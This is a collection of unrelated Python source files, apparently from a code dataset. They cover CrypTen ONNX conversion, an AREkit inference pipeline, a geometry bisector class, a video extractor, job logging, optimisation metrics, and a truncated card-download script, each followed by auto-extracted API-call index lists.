    assert len(output_names) == 1, "Only one output per model supported."
    graph = module.Graph(input_names, output_names[0])

    # Register every initializer tensor as a Parameter node.
    for initializer in onnx_model.graph.initializer:
        tensor = torch.from_numpy(numpy_helper.to_array(initializer))
        graph.add_module(initializer.name, module.Parameter(tensor), [])

    # Translate every ONNX operator into its CrypTen counterpart.
    for op_node in onnx_model.graph.node:
        attributes = {
            attr.name: _get_attribute_value(attr) for attr in op_node.attribute
        }
        crypten_class = _get_operator_class(op_node.op_type, attributes)

        crypten_module = crypten_class.from_onnx(attributes=attributes)
        node_inputs = list(op_node.input)
        node_outputs = list(op_node.output)
        if op_node.op_type == "Dropout":
            node_outputs = [node_outputs[0]]  # do not output Dropout mask
        graph.add_module(
            node_outputs[0], crypten_module, node_inputs, output_names=node_outputs
        )

    # Collapse a single-module graph down to the bare module.
    return _get_model_or_module(graph)
def _load_onnx_model(onnx_string_or_file):
    """
    Loads ONNX model from file or string.
    """
    if not hasattr(onnx_string_or_file, "seek"):
        # serialized protobuf string
        return onnx.load_model_from_string(onnx_string_or_file)
    # file-like object: rewind before parsing
    onnx_string_or_file.seek(0)
    return onnx.load(onnx_string_or_file)
def _get_input_output_names(onnx_model):
    """
    Return input and output names of the ONNX graph.
    """
    graph = onnx_model.graph
    input_names = [value.name for value in graph.input]
    output_names = [value.name for value in graph.output]
    assert len(input_names) >= 1, "number of inputs should be at least 1"
    assert len(output_names) == 1, "number of outputs should be 1"
    return input_names, output_names
def _get_model_or_module(crypten_model):
    """
    Returns `Module` if model contains only one module. Otherwise returns model.
    """
    submodules = list(crypten_model.modules())
    if len(submodules) == 1:
        return submodules[0]
    return crypten_model
def _get_attribute_value(attr):
    """
    Retrieves value from an ONNX attribute.
    """
    if attr.HasField("f"):  # floating-point attribute
        return attr.f
    if attr.HasField("i"):  # integer attribute
        return attr.i
    if attr.HasField("s"):  # string attribute
        return attr.s  # TODO: Sanitize string.
    if attr.HasField("t"):  # tensor attribute
        return torch.from_numpy(numpy_helper.to_array(attr.t))
    if len(attr.ints) > 0:  # list-of-ints attribute
        return list(attr.ints)
    if len(attr.floats) > 0:  # list-of-floats attribute
        return list(attr.floats)
    raise ValueError("Unknown attribute type for attribute %s." % attr.name)
def _get_operator_class(node_op_type, attributes):
    """
    Returns the `crypten.nn.Module` type corresponding to an ONNX node.
    """
    # Prefer a crypten.nn attribute with the same name; otherwise fall back to
    # the explicit ONNX-to-CrypTen mapping.
    fallback = ONNX_TO_CRYPTEN.get(node_op_type, None)
    crypten_class = getattr(module, node_op_type, fallback)
    if crypten_class is None:
        raise ValueError(f"CrypTen does not support ONNX op {node_op_type}.")
    return crypten_class
def _update_onnx_symbolic_registry():
    """
    Updates the ONNX symbolic registry for operators that need a CrypTen-specific
    implementation and custom operators.
    """
    # CrypTen-specific symbolic functions, keyed by the registry entry they replace.
    crypten_symbolics = {
        "softmax": _onnx_crypten_softmax,
        "log_softmax": _onnx_crypten_logsoftmax,
        "dropout": _onnx_crypten_dropout,
        "feature_dropout": _onnx_crypten_feature_dropout,
    }
    for opset_version, registry in sym_registry._registry.items():
        for function_key in list(registry.keys()):
            if function_key in crypten_symbolics:
                sym_registry._registry[opset_version][function_key] = crypten_symbolics[
                    function_key
                ]
@sym_help.parse_args("v", "i", "none")
def _onnx_crypten_softmax(g, input, dim, dtype=None):
    """
    Export PyTorch's Softmax as a single ONNX Softmax node.

    Overrides PyTorch's default lowering of Softmax into Exp, ReduceSum and Div,
    which can overflow numerically when evaluated on CrypTensors.
    """
    output = g.op("Softmax", input, axis_i=dim)
    if dtype and dtype.node().kind() != "prim::Constant":
        scalar_type = sym_help._get_const(dtype, "i", "dtype")
        output = g.op("Cast", output, to_i=sym_help.scalar_type_to_onnx[scalar_type])
    return output
@sym_help.parse_args("v", "i", "none")
def _onnx_crypten_logsoftmax(g, input, dim, dtype=None):
    """
    Export PyTorch's LogSoftmax as a single ONNX LogSoftmax node.

    Overrides PyTorch's default conversion to avoid potentially creating
    Transpose operators.
    """
    output = g.op("LogSoftmax", input, axis_i=dim)
    if dtype and dtype.node().kind() != "prim::Constant":
        scalar_type = sym_help._get_const(dtype, "i", "dtype")
        output = g.op("Cast", output, to_i=sym_help.scalar_type_to_onnx[scalar_type])
    return output
@sym_help.parse_args("v", "f", "i")
def _onnx_crypten_dropout(g, input, p, train):
    """
    Export PyTorch's Dropout as an ONNX Dropout node instead of removing it.

    PyTorch's default export drops Dropout because it assumes ONNX graphs are
    inference-only; CrypTen converts ONNX graphs into trainable models, so the
    node must be preserved. Only the output (not the mask) is returned.
    """
    output, _mask = g.op("Dropout", input, ratio_f=p, outputs=2)
    return output
@sym_help.parse_args("v", "f", "i")
def _onnx_crypten_feature_dropout(g, input, p, train):
    """
    Export PyTorch's DropoutNd as an ONNX DropoutNd node instead of removing it.

    PyTorch's default export drops DropoutNd because it assumes ONNX graphs are
    inference-only; CrypTen converts ONNX graphs into trainable models, so the
    node must be preserved. Only the output (not the mask) is returned.
    """
    output, _mask = g.op("DropoutNd", input, ratio_f=p, outputs=2)
    return output
| [
"torch.onnx.symbolic_helper.parse_args",
"tensorflow.Graph",
"torch.onnx.symbolic_helper._get_const",
"io.BytesIO",
"torch.onnx.symbolic_registry._registry.items",
"tf2onnx.tf_loader.tf_session",
"tf2onnx.optimizer.optimize_graph",
"onnx.load_model_from_string",
"onnx.load",
"tensorflow.import_gra... | [((9120, 9157), 'torch.onnx.symbolic_helper.parse_args', 'sym_help.parse_args', (['"""v"""', '"""i"""', '"""none"""'], {}), "('v', 'i', 'none')\n", (9139, 9157), True, 'import torch.onnx.symbolic_helper as sym_help\n'), ((9806, 9843), 'torch.onnx.symbolic_helper.parse_args', 'sym_help.parse_args', (['"""v"""', '"""i"""', '"""none"""'], {}), "('v', 'i', 'none')\n", (9825, 9843), True, 'import torch.onnx.symbolic_helper as sym_help\n'), ((10417, 10451), 'torch.onnx.symbolic_helper.parse_args', 'sym_help.parse_args', (['"""v"""', '"""f"""', '"""i"""'], {}), "('v', 'f', 'i')\n", (10436, 10451), True, 'import torch.onnx.symbolic_helper as sym_help\n'), ((11085, 11119), 'torch.onnx.symbolic_helper.parse_args', 'sym_help.parse_args', (['"""v"""', '"""f"""', '"""i"""'], {}), "('v', 'f', 'i')\n", (11104, 11119), True, 'import torch.onnx.symbolic_helper as sym_help\n'), ((1252, 1280), 'copy.deepcopy', 'copy.deepcopy', (['pytorch_model'], {}), '(pytorch_model)\n', (1265, 1280), False, 'import copy\n'), ((2518, 2553), 'tf2onnx.optimizer.optimize_graph', 'tf2onnx.optimizer.optimize_graph', (['g'], {}), '(g)\n', (2550, 2553), False, 'import tf2onnx\n'), ((2666, 2678), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (2676, 2678), False, 'import io\n'), ((3556, 3568), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (3566, 3568), False, 'import io\n'), ((4109, 4167), 'torch.onnx.export', 'torch.onnx.export', (['pytorch_model', 'dummy_input', 'f'], {}), '(pytorch_model, dummy_input, f, **kwargs)\n', (4126, 4167), False, 'import torch\n'), ((6200, 6248), 'onnx.load_model_from_string', 'onnx.load_model_from_string', (['onnx_string_or_file'], {}), '(onnx_string_or_file)\n', (6227, 6248), False, 'import onnx\n'), ((8334, 8364), 'torch.onnx.symbolic_registry._registry.items', 'sym_registry._registry.items', ([], {}), '()\n', (8362, 8364), True, 'import torch.onnx.symbolic_registry as sym_registry\n'), ((2193, 2243), 'tensorflow.import_graph_def', 
'tf.import_graph_def', (['tensorflow_graph_def'], {'name': '""""""'}), "(tensorflow_graph_def, name='')\n", (2212, 2243), True, 'import tensorflow as tf\n'), ((2253, 2297), 'tf2onnx.tf_loader.tf_session', 'tf2onnx.tf_loader.tf_session', ([], {'graph': 'tf_graph'}), '(graph=tf_graph)\n', (2281, 2297), False, 'import tf2onnx\n'), ((2311, 2433), 'tf2onnx.tfonnx.process_tf_graph', 'tf2onnx.tfonnx.process_tf_graph', (['tf_graph'], {'opset': '(10)', 'continue_on_error': '(False)', 'input_names': 'inputs', 'output_names': 'outputs'}), '(tf_graph, opset=10, continue_on_error=False,\n input_names=inputs, output_names=outputs)\n', (2342, 2433), False, 'import tf2onnx\n'), ((3285, 3297), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (3295, 3297), False, 'import io\n'), ((6158, 6188), 'onnx.load', 'onnx.load', (['onnx_string_or_file'], {}), '(onnx_string_or_file)\n', (6167, 6188), False, 'import onnx\n'), ((9657, 9697), 'torch.onnx.symbolic_helper._get_const', 'sym_help._get_const', (['dtype', '"""i"""', '"""dtype"""'], {}), "(dtype, 'i', 'dtype')\n", (9676, 9697), True, 'import torch.onnx.symbolic_helper as sym_help\n'), ((10268, 10308), 'torch.onnx.symbolic_helper._get_const', 'sym_help._get_const', (['dtype', '"""i"""', '"""dtype"""'], {}), "(dtype, 'i', 'dtype')\n", (10287, 10308), True, 'import torch.onnx.symbolic_helper as sym_help\n'), ((5050, 5077), 'onnx.numpy_helper.to_array', 'numpy_helper.to_array', (['node'], {}), '(node)\n', (5071, 5077), False, 'from onnx import numpy_helper\n'), ((2148, 2158), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (2156, 2158), True, 'import tensorflow as tf\n'), ((7430, 7459), 'onnx.numpy_helper.to_array', 'numpy_helper.to_array', (['attr.t'], {}), '(attr.t)\n', (7451, 7459), False, 'from onnx import numpy_helper\n')] |
from arekit.common.data.input.providers.label.multiple import MultipleLabelProvider
from arekit.common.data.row_ids.multiple import MultipleIDProvider
from arekit.common.data.storages.base import BaseRowsStorage
from arekit.common.data.views.samples import BaseSampleStorageView
from arekit.common.experiment.data_type import DataType
from arekit.common.labels.scaler import BaseLabelScaler
from arekit.contrib.experiment_rusentrel.labels.scalers.three import ThreeLabelScaler
from arekit.contrib.networks.context.architectures.pcnn import PiecewiseCNN
from arekit.contrib.networks.context.configurations.cnn import CNNConfig
from arekit.contrib.networks.core.ctx_inference import InferenceContext
from arekit.contrib.networks.core.feeding.bags.collection.single import SingleBagsCollection
from arekit.contrib.networks.core.input.helper_embedding import EmbeddingHelper
from arekit.contrib.networks.core.model import BaseTensorflowModel
from arekit.contrib.networks.core.model_io import NeuralNetworkModelIO
from arekit.contrib.networks.core.predict.provider import BasePredictProvider
from arekit.contrib.networks.core.predict.tsv_writer import TsvPredictWriter
from arekit.contrib.networks.shapes import NetworkInputShapes
from examples.input import EXAMPLES
from examples.repository import pipeline_serialize
def pipeline_infer(labels_scaler):
assert(isinstance(labels_scaler, BaseLabelScaler))
# Step 4. Deserialize data
network = PiecewiseCNN()
config = CNNConfig()
config.set_term_embedding(EmbeddingHelper.load_vocab("embedding.txt"))
inference_ctx = InferenceContext.create_empty()
inference_ctx.initialize(
dtypes=[DataType.Test],
create_samples_view_func=lambda data_type: BaseSampleStorageView(
storage=BaseRowsStorage.from_tsv("samples.txt"),
row_ids_provider=MultipleIDProvider()),
has_model_predefined_state=True,
vocab=EmbeddingHelper.load_vocab("vocab.txt"),
labels_count=3,
input_shapes=NetworkInputShapes(iter_pairs=[
(NetworkInputShapes.FRAMES_PER_CONTEXT, config.FramesPerContext),
(NetworkInputShapes.TERMS_PER_CONTEXT, config.TermsPerContext),
(NetworkInputShapes.SYNONYMS_PER_CONTEXT, config.SynonymsPerContext),
]),
bag_size=config.BagSize)
# Step 5. Model preparation.
model = BaseTensorflowModel(
nn_io=NeuralNetworkModelIO(
target_dir=".model",
full_model_name="PCNN",
model_name_tag="_"),
network=network,
config=config,
inference_ctx=inference_ctx,
bags_collection_type=SingleBagsCollection, # Используем на вход 1 пример.
)
model.predict()
# Step 6. Gather annotated contexts onto document level.
labeled_samples = model.get_labeled_samples_collection(data_type=DataType.Test)
predict_provider = BasePredictProvider()
# TODO. For now it is limited to tsv.
with TsvPredictWriter(filepath="out.txt") as out:
title, contents_it = predict_provider.provide(
sample_id_with_uint_labels_iter=labeled_samples.iter_non_duplicated_labeled_sample_row_ids(),
labels_scaler=labels_scaler)
out.write(title=title,
contents_it=contents_it)
if __name__ == '__main__':
text = EXAMPLES["simple"]
labels_scaler = ThreeLabelScaler()
label_provider = MultipleLabelProvider(label_scaler=labels_scaler)
pipeline_serialize(sentences_text_list=text, label_provider=label_provider)
pipeline_infer(labels_scaler)
| [
"arekit.contrib.networks.core.ctx_inference.InferenceContext.create_empty",
"examples.repository.pipeline_serialize",
"arekit.contrib.networks.core.input.helper_embedding.EmbeddingHelper.load_vocab",
"arekit.contrib.networks.core.predict.tsv_writer.TsvPredictWriter",
"arekit.contrib.experiment_rusentrel.lab... | [((1454, 1468), 'arekit.contrib.networks.context.architectures.pcnn.PiecewiseCNN', 'PiecewiseCNN', ([], {}), '()\n', (1466, 1468), False, 'from arekit.contrib.networks.context.architectures.pcnn import PiecewiseCNN\n'), ((1482, 1493), 'arekit.contrib.networks.context.configurations.cnn.CNNConfig', 'CNNConfig', ([], {}), '()\n', (1491, 1493), False, 'from arekit.contrib.networks.context.configurations.cnn import CNNConfig\n'), ((1591, 1622), 'arekit.contrib.networks.core.ctx_inference.InferenceContext.create_empty', 'InferenceContext.create_empty', ([], {}), '()\n', (1620, 1622), False, 'from arekit.contrib.networks.core.ctx_inference import InferenceContext\n'), ((2900, 2921), 'arekit.contrib.networks.core.predict.provider.BasePredictProvider', 'BasePredictProvider', ([], {}), '()\n', (2919, 2921), False, 'from arekit.contrib.networks.core.predict.provider import BasePredictProvider\n'), ((3377, 3395), 'arekit.contrib.experiment_rusentrel.labels.scalers.three.ThreeLabelScaler', 'ThreeLabelScaler', ([], {}), '()\n', (3393, 3395), False, 'from arekit.contrib.experiment_rusentrel.labels.scalers.three import ThreeLabelScaler\n'), ((3417, 3466), 'arekit.common.data.input.providers.label.multiple.MultipleLabelProvider', 'MultipleLabelProvider', ([], {'label_scaler': 'labels_scaler'}), '(label_scaler=labels_scaler)\n', (3438, 3466), False, 'from arekit.common.data.input.providers.label.multiple import MultipleLabelProvider\n'), ((3472, 3547), 'examples.repository.pipeline_serialize', 'pipeline_serialize', ([], {'sentences_text_list': 'text', 'label_provider': 'label_provider'}), '(sentences_text_list=text, label_provider=label_provider)\n', (3490, 3547), False, 'from examples.repository import pipeline_serialize\n'), ((1525, 1568), 'arekit.contrib.networks.core.input.helper_embedding.EmbeddingHelper.load_vocab', 'EmbeddingHelper.load_vocab', (['"""embedding.txt"""'], {}), "('embedding.txt')\n", (1551, 1568), False, 'from 
arekit.contrib.networks.core.input.helper_embedding import EmbeddingHelper\n'), ((2974, 3010), 'arekit.contrib.networks.core.predict.tsv_writer.TsvPredictWriter', 'TsvPredictWriter', ([], {'filepath': '"""out.txt"""'}), "(filepath='out.txt')\n", (2990, 3010), False, 'from arekit.contrib.networks.core.predict.tsv_writer import TsvPredictWriter\n'), ((1927, 1966), 'arekit.contrib.networks.core.input.helper_embedding.EmbeddingHelper.load_vocab', 'EmbeddingHelper.load_vocab', (['"""vocab.txt"""'], {}), "('vocab.txt')\n", (1953, 1966), False, 'from arekit.contrib.networks.core.input.helper_embedding import EmbeddingHelper\n'), ((2013, 2258), 'arekit.contrib.networks.shapes.NetworkInputShapes', 'NetworkInputShapes', ([], {'iter_pairs': '[(NetworkInputShapes.FRAMES_PER_CONTEXT, config.FramesPerContext), (\n NetworkInputShapes.TERMS_PER_CONTEXT, config.TermsPerContext), (\n NetworkInputShapes.SYNONYMS_PER_CONTEXT, config.SynonymsPerContext)]'}), '(iter_pairs=[(NetworkInputShapes.FRAMES_PER_CONTEXT,\n config.FramesPerContext), (NetworkInputShapes.TERMS_PER_CONTEXT, config\n .TermsPerContext), (NetworkInputShapes.SYNONYMS_PER_CONTEXT, config.\n SynonymsPerContext)])\n', (2031, 2258), False, 'from arekit.contrib.networks.shapes import NetworkInputShapes\n'), ((2407, 2496), 'arekit.contrib.networks.core.model_io.NeuralNetworkModelIO', 'NeuralNetworkModelIO', ([], {'target_dir': '""".model"""', 'full_model_name': '"""PCNN"""', 'model_name_tag': '"""_"""'}), "(target_dir='.model', full_model_name='PCNN',\n model_name_tag='_')\n", (2427, 2496), False, 'from arekit.contrib.networks.core.model_io import NeuralNetworkModelIO\n'), ((1779, 1818), 'arekit.common.data.storages.base.BaseRowsStorage.from_tsv', 'BaseRowsStorage.from_tsv', (['"""samples.txt"""'], {}), "('samples.txt')\n", (1803, 1818), False, 'from arekit.common.data.storages.base import BaseRowsStorage\n'), ((1849, 1869), 'arekit.common.data.row_ids.multiple.MultipleIDProvider', 'MultipleIDProvider', ([], {}), '()\n', 
(1867, 1869), False, 'from arekit.common.data.row_ids.multiple import MultipleIDProvider\n')] |
from Point import Point
import Constant as c
from GeometryMath import bisector_point
class Bisector(Point):
    """Point defined as the tkz bisector point of an angle A-B-C."""

    def __init__(self, item):
        """Construct Bisector."""
        Point.__init__(self, item)
        self.item["sub_type"] = c.Point.Definition.BISECTOR

    def tikzify(self):
        """Return the TikZ command that defines this bisector point."""
        defn = self.item["definition"]
        return '\\tkzDefLine[bisector](%s,%s,%s)\\tkzGetPoint{%s}' % (
            defn["A"],
            defn["B"],
            defn["C"],
            self.get_id())

    def recompute_canvas(self, items, window, width, height):
        """Recompute canvas coordinates from the three defining points."""
        point_a = items[self.depends_on()[0]].get_canvas_coordinates()
        point_b = items[self.depends_on()[1]].get_canvas_coordinates()
        point_c = items[self.depends_on()[2]].get_canvas_coordinates()
        self.set_canvas_coordinates(*bisector_point(point_a, point_b, point_c))

    def __str__(self):
        defn = self.item["definition"]
        return "Bisector point (%s) of angle %s" \
            % (self.item["id"], defn["A"] + defn["B"] + defn["C"])

    def definition_builder(self, data, items=None):
        """Map the three point ids in *data* onto the A/B/C slots."""
        if len(data) == 3:
            return {"A": data[0], "B": data[1], "C": data[2]}

    def parse_into_definition(self, arguments, items):
        """Validate *arguments* (three existing, non-cyclic point ids) and
        return the definition dict, or None on any violation."""
        # arguments length condition
        if len(arguments) != 3:
            return None
        # all arguments are members of the regular expression for argument name
        if not all(self.name_pattern(arg) for arg in arguments):
            return None
        # all arguments are items that already exist
        if not all(arg in items for arg in arguments):
            return None
        # the type of all arguments is of a certain type
        if not all(items[arg].item["type"] == 'point' for arg in arguments):
            return None
        # self-reference condition (self-reference is not permitted)
        if self.get_id() in arguments:
            return None
        # condition for cross reference
        for arg_id in arguments:
            if self.get_id() in items[arg_id].deep_depends_on(items):
                return None
        return self.definition_builder(arguments)

    @staticmethod
    def static_patterns():
        return ["ppp"]

    def patterns(self):
        return ["ppp"]
| [
"Point.Point.__init__",
"GeometryMath.bisector_point"
] | [((182, 208), 'Point.Point.__init__', 'Point.__init__', (['self', 'item'], {}), '(self, item)\n', (196, 208), False, 'from Point import Point\n'), ((973, 996), 'GeometryMath.bisector_point', 'bisector_point', (['A', 'B', 'C'], {}), '(A, B, C)\n', (987, 996), False, 'from GeometryMath import bisector_point\n')] |
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import int_or_none
class SciVeeIE(InfoExtractor):
    """Extractor for scivee.tv node pages (audio + video variants)."""

    _VALID_URL = r'https?://(?:www\.)?scivee\.tv/node/(?P<id>\d+)'

    _TEST = {
        'url': 'http://www.scivee.tv/node/62352',
        'md5': 'b16699b74c9e6a120f6772a44960304f',
        'info_dict': {
            'id': '62352',
            'ext': 'mp4',
            'title': '<NAME> at the 2014 DOE JGI Genomics of Energy & Environment Meeting',
            'description': 'md5:81f1710638e11a481358fab1b11059d7',
        },
    }

    def _real_extract(self, url):
        video_id = re.match(self._VALID_URL, url).group('id')

        # annotations XML is malformed
        annotations = self._download_webpage(
            'http://www.scivee.tv/assets/annotations/%s' % video_id, video_id, 'Downloading annotations')

        title = self._html_search_regex(r'<title>([^<]+)</title>', annotations, 'title')
        description = self._html_search_regex(r'<abstract>([^<]+)</abstract>', annotations, 'abstract', fatal=False)
        filesize = int_or_none(self._html_search_regex(
            r'<filesize>([^<]+)</filesize>', annotations, 'filesize', fatal=False))

        audio_format = {
            'url': 'http://www.scivee.tv/assets/audio/%s' % video_id,
            'ext': 'mp3',
            'format_id': 'audio',
        }
        video_format = {
            'url': 'http://www.scivee.tv/assets/video/%s' % video_id,
            'ext': 'mp4',
            'format_id': 'video',
            'filesize': filesize,
        }

        return {
            'id': video_id,
            'title': title,
            'description': description,
            'thumbnail': 'http://www.scivee.tv/assets/videothumb/%s' % video_id,
            'formats': [audio_format, video_format],
        }
| [
"re.match"
] | [((636, 666), 're.match', 're.match', (['self._VALID_URL', 'url'], {}), '(self._VALID_URL, url)\n', (644, 666), False, 'import re\n')] |
"""Module containing class `JobLoggingManager`."""
from collections import defaultdict
from logging import FileHandler, Handler
from logging.handlers import QueueHandler, QueueListener
from multiprocessing import Queue
import logging
import vesper.util.logging_utils as logging_utils
import vesper.util.os_utils as os_utils
# TODO: Add record count fields to the `Job` model class, and modify
# the record counts handler to update the fields both while a job is
# running and upon completion.
class _RecordCountsHandler(Handler):
def __init__(self):
super().__init__()
self.record_counts = defaultdict(int)
def emit(self, record):
self.record_counts[record.levelno] += 1
class JobLoggingManager:

    """
    Manages logging for a Vesper job.

    A `JobLoggingManager` manages logging for the processes of a Vesper job.
    Log records can be submitted by any process of a job using any logger
    (typically the root logger) configured with the `configure_logger`
    static method. A logger so configured writes each log record to a
    multiprocessing queue that is read by a thread running in the main
    job process, which in turn writes log messages to the job's log file.
    """

    @staticmethod
    def configure_logger(logger, logging_config):

        """
        Configures the specified logger to write log records to this job's
        logging queue.

        For the `logging_config` argument, the main job process can pass
        the `logging_config` attribute of its `JobLoggingManager`. This
        information is also passed to the `execute` method of the job's
        command as the `logging_config` attribute of the command's
        execution context. The information is picklable, so it can be
        delivered easily to any additional process started by the main
        job process as an argument to the process's target function.
        """

        # `logging_config` is the (level, queue) pair built by
        # the `logging_config` property below.
        level, queue = logging_config
        logger.setLevel(level)
        handler = QueueHandler(queue)
        logger.addHandler(handler)

    def __init__(self, job, level):
        """Create the queue, file handler and (not yet started) listener
        for `job`, logging at numeric level `level`."""

        self.job = job
        self.level = level

        # Create queue through which log records can be sent from various
        # processes and threads to the logging thread.
        self.queue = Queue()

        formatter = logging_utils.create_formatter()

        # Create handler that writes log messages to the job log file.
        os_utils.create_parent_directory(job.log_file_path)
        file_handler = FileHandler(job.log_file_path, 'w')
        file_handler.setFormatter(formatter)

        # We used to create a second handler here, of type StreamHandler,
        # which wrote messages to stderr, and add it to the QueueListener
        # below, but that is no longer desirable since we now configure
        # console output on the root logger in our Django project's
        # settings.py file. Adding the second handler here would be
        # redundant, causing jobs to output two copies of each log
        # message to the console.
        self._record_counts_handler = _RecordCountsHandler()

        # Create logging listener that will run on its own thread and log
        # messages sent to it via the queue.
        self._listener = QueueListener(
            self.queue, file_handler, self._record_counts_handler)

    @property
    def logging_config(self):
        """Picklable (level, queue) pair for `configure_logger`."""
        return (self.level, self.queue)

    @property
    def record_counts(self):
        """Snapshot dict mapping logging level number to record count."""
        return dict(self._record_counts_handler.record_counts)

    def start_up_logging(self):
        """Start the queue listener thread."""
        self._listener.start()

    def shut_down_logging(self):
        """Stop the listener thread and shut down the logging system."""

        # Tell logging listener to terminate, and wait for it to do so.
        self._listener.stop()

        logging.shutdown()
| [
"logging.handlers.QueueHandler",
"vesper.util.logging_utils.create_formatter",
"logging.handlers.QueueListener",
"vesper.util.os_utils.create_parent_directory",
"logging.shutdown",
"collections.defaultdict",
"logging.FileHandler",
"multiprocessing.Queue"
] | [((621, 637), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (632, 637), False, 'from collections import defaultdict\n'), ((2101, 2120), 'logging.handlers.QueueHandler', 'QueueHandler', (['queue'], {}), '(queue)\n', (2113, 2120), False, 'from logging.handlers import QueueHandler, QueueListener\n'), ((2420, 2427), 'multiprocessing.Queue', 'Queue', ([], {}), '()\n', (2425, 2427), False, 'from multiprocessing import Queue\n'), ((2457, 2489), 'vesper.util.logging_utils.create_formatter', 'logging_utils.create_formatter', ([], {}), '()\n', (2487, 2489), True, 'import vesper.util.logging_utils as logging_utils\n'), ((2578, 2629), 'vesper.util.os_utils.create_parent_directory', 'os_utils.create_parent_directory', (['job.log_file_path'], {}), '(job.log_file_path)\n', (2610, 2629), True, 'import vesper.util.os_utils as os_utils\n'), ((2653, 2688), 'logging.FileHandler', 'FileHandler', (['job.log_file_path', '"""w"""'], {}), "(job.log_file_path, 'w')\n", (2664, 2688), False, 'from logging import FileHandler, Handler\n'), ((3415, 3483), 'logging.handlers.QueueListener', 'QueueListener', (['self.queue', 'file_handler', 'self._record_counts_handler'], {}), '(self.queue, file_handler, self._record_counts_handler)\n', (3428, 3483), False, 'from logging.handlers import QueueHandler, QueueListener\n'), ((3967, 3985), 'logging.shutdown', 'logging.shutdown', ([], {}), '()\n', (3983, 3985), False, 'import logging\n')] |
import math
from typing import List
import numpy as np
from datasets.Dataset import Dataset
from models.Solution import Solution
def calculate_avgValue(population: List[Solution]) -> float:
    """Return the mean mono-objective score over *population*."""
    total = sum(ind.compute_mono_objective_score() for ind in population)
    return total / len(population)
def calculate_bestAvgValue(population: List[Solution]) -> float:
    """Return the highest mono-objective score found in *population*.

    Keeps the original floor of 0: if the population is empty or every
    score is below 0, 0 is returned.  Each solution's score is computed
    exactly once (the previous version evaluated it twice per improving
    candidate: once in the comparison and once in the assignment).
    """
    best = 0
    for ind in population:
        score = ind.compute_mono_objective_score()
        if score > best:
            best = score
    return best
def calculate_numSolutions(population: List[Solution]) -> int:
    """Number of distinct solutions in *population* (hash-based dedup)."""
    distinct = set(population)
    return len(distinct)
def calculate_spacing(population: List[Solution]) -> float:
    """Spacing indicator over the two objectives (cost, satisfaction).

    For each solution, accumulates sqrt(sum_i (1 - |obj_i| / mean_i)^2)
    and normalizes by (population size * number of objectives).
    """
    n = len(population)
    num_objectives = 2

    # per-objective means over the whole population
    mean_cost = sum(sol.total_cost for sol in population) / n
    mean_sat = sum(sol.total_satisfaction for sol in population) / n
    means = [mean_cost, mean_sat]

    total = 0
    for sol in population:
        objective_values = [sol.total_cost, sol.total_satisfaction]
        acc = 0
        for mean_value, obj_value in zip(means, objective_values):
            acc += (1 - (abs(obj_value) / mean_value)) ** 2
        total += math.sqrt(acc)

    return total / (n * num_objectives)
def calculate_hypervolume(population: List[Solution]) -> float:
    """Hypervolume-style indicator: product of the normalised extents of
    the population along the cost and satisfaction objectives.

    Normalisation bounds come from the first solution's
    get_max/min_cost_satisfactions() methods.
    """
    max_cost, max_sat = population[0].get_max_cost_satisfactions()
    min_cost, min_sat = population[0].get_min_cost_satisfactions()

    costs = [ind.total_cost for ind in population]
    sats = [ind.total_satisfaction for ind in population]

    # the highest observed value keeps the original floor of 0
    # (the original scan started its running maximum at 0)
    cost_hi = (max(0, max(costs)) - min_cost) / (max_cost - min_cost)
    cost_lo = (min(costs) - min_cost) / (max_cost - min_cost)
    cost_span = cost_hi - cost_lo

    sat_hi = (max(0, max(sats)) - min_sat) / (max_sat - min_sat)
    sat_lo = (min(sats) - min_sat) / (max_sat - min_sat)
    sat_span = sat_hi - sat_lo

    return cost_span * sat_span
def eudis2(v1: List[float], v2: List[float]) -> float:
    """Euclidean distance between the points *v1* and *v2*.

    The arguments are coordinate sequences (e.g. ``[x, y]``), not single
    floats -- the previous ``float`` annotations were misleading, since
    ``math.dist`` requires two same-length sequences of coordinates.
    """
    return math.dist(v1, v2)
def calculate_spread(population: List[Solution], dataset: Dataset) -> float:
    """Spread (diversity) indicator of *population* in objective space.

    Combines the distances from the boundary solutions to the ideal
    extreme points with the deviation of consecutive inter-solution
    distances from their population-wide mean.
    """
    ideal_first = [0, 0]
    ideal_last = [np.max(dataset.pbis_satisfaction_scaled),
                  np.max(dataset.pbis_cost_scaled)]

    points = [[sol.total_satisfaction, sol.total_cost] for sol in population]
    n = len(points)

    # distances from the boundary solutions to the ideal extremes
    df = eudis2(points[0], ideal_first)
    dl = eudis2(points[-1], ideal_last)

    # mean pairwise distance over all ordered pairs (i != j)
    davg = 0
    pair_count = 0
    for i, p in enumerate(points):
        for j, q in enumerate(points):
            # avoid distance from a point to itself
            if i != j:
                pair_count += 1
                davg += eudis2(p, q)
    davg /= pair_count

    # sum over consecutive solutions of |d_i - davg|
    deviation = 0
    for p, q in zip(points, points[1:]):
        deviation += abs(eudis2(p, q) - davg)

    # spread formula
    return (df + dl + deviation) / (df + dl + (n - 1) * davg)
def calculate_mean_bits_per_sol(solutions: List[Solution]) -> float:
    """Mean number of selected genes (nonzero entries) per solution."""
    selected_counts = [np.count_nonzero(sol.selected) for sol in solutions]
    return sum(selected_counts) / len(solutions)
| [
"numpy.count_nonzero",
"math.sqrt",
"math.dist",
"numpy.max"
] | [((3003, 3020), 'math.dist', 'math.dist', (['v1', 'v2'], {}), '(v1, v2)\n', (3012, 3020), False, 'import math\n'), ((3190, 3230), 'numpy.max', 'np.max', (['dataset.pbis_satisfaction_scaled'], {}), '(dataset.pbis_satisfaction_scaled)\n', (3196, 3230), True, 'import numpy as np\n'), ((3246, 3278), 'numpy.max', 'np.max', (['dataset.pbis_cost_scaled'], {}), '(dataset.pbis_cost_scaled)\n', (3252, 3278), True, 'import numpy as np\n'), ((1581, 1603), 'math.sqrt', 'math.sqrt', (['aux_spacing'], {}), '(aux_spacing)\n', (1590, 1603), False, 'import math\n'), ((4782, 4812), 'numpy.count_nonzero', 'np.count_nonzero', (['sol.selected'], {}), '(sol.selected)\n', (4798, 4812), True, 'import numpy as np\n')] |
import json
import mtgsdk as mtg
magic_sets = ('grn',)
def main():
    """Download every configured MTG set and dump its cards to JSON files
    under tests/data/ (one file per set code)."""
    for set_code in magic_sets:
        card_dicts = [vars(card) for card in mtg.Card.where(set=set_code).all()]
